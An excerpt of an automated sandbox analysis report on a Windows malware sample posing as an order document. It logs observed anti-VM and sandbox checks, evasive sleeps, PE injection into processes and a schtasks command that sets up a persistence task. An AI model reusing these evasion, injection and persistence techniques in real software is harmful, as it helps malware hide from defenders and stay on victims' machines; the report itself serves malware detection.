Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: ORDER (6256 OS)#391 PI.exe PID: 1688, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: WsdnBq.exe PID: 6004, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.338224910.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000005.00000002.398697821.0000000002D41000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.338224910.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000005.00000002.398697821.0000000002D41000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe TID: 6024 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe TID: 4864 Thread sleep count: 8986 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe TID: 5116 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe TID: 5064 Thread sleep count: 8770 > 30 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Window / User API: threadDelayed 8986 Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Window / User API: threadDelayed 8770 Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.333366002.0000000008D9A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
Source: WsdnBq.exe, 00000005.00000002.398697821.0000000002D41000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
Source: WsdnBq.exe, 00000005.00000002.398697821.0000000002D41000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: WsdnBq.exe, 00000005.00000002.398697821.0000000002D41000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: WsdnBq.exe, 00000005.00000002.398697821.0000000002D41000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: WsdnBq.exe, 00000005.00000002.398697821.0000000002D41000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWARE
Source: WsdnBq.exe, 00000005.00000002.398697821.0000000002D41000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: WsdnBq.exe, 00000005.00000002.398697821.0000000002D41000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: WsdnBq.exe, 00000005.00000002.398697821.0000000002D41000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
Source: WsdnBq.exe, 00000005.00000002.398697821.0000000002D41000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: WsdnBq.exe, 00000008.00000003.450250389.00000000015E6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Enables debug privileges
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Memory written: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe base: 400000 value starts with: 4D5A Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WsdnBq" /XML "C:\Users\user\AppData\Local\Temp\tmpF47D.tmp Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process created: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe {path} Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Process created: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe {path} Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WsdnBq" /XML "C:\Users\user\AppData\Local\Temp\tmp645E.tmp Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Process created: C:\Users\user\AppData\Roaming\WsdnBq.exe {path} Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation Jump to behavior
